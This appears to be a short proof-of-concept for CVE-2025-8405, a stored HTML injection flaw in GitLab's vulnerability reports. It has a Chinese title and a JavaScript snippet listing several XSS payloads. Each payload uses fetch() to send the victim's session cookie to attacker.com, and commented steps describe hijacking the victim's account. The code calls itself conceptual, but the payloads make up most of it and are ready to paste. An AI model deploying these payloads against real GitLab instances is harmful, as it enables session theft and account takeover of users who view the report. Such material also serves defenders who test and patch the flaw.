CVE-2025-8405: GitLab CE/EE 存储型HTML注入漏洞

// CVE-2025-8405 PoC - GitLab HTML Injection in Vulnerability Code Flow // This PoC demonstrates the HTML injection vulnerability in GitLab's vulnerability reporting feature // Note: This is a conceptual PoC based on the vulnerability description. // Actual exploitation requires a valid GitLab account with permission to create vulnerability reports. // Malicious payload that could be injected into the vulnerability code flow: const maliciousPayload = { title: 'Test Vulnerability', description: '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>', // Alternative payloads: alternativePayloads: [ '<img src=x onerror="fetch(\'https://attacker.com/steal?cookie=\'+document.cookie)">', '<svg onload="fetch(\'https://attacker.com/steal?cookie=\'+document.cookie)">', '<a href="javascript:fetch(\'https://attacker.com/steal?cookie=\'+document.cookie)">Click me</a>' ] }; // Attack flow: // 1. Attacker creates a new vulnerability report with malicious HTML/JS payload // 2. Payload is stored in GitLab database without proper sanitization // 3. When victim views the vulnerability report, payload executes in victim's browser // 4. Attacker steals victim's session cookie // 5. Attacker hijacks victim's account console.log('CVE-2025-8405 PoC - HTML Injection in GitLab Vulnerability Code Flow'); console.log('Affected Versions: GitLab CE/EE 17.1 to <18.4.6, 18.5 to <18.5.4, 18.6 to <18.6.2');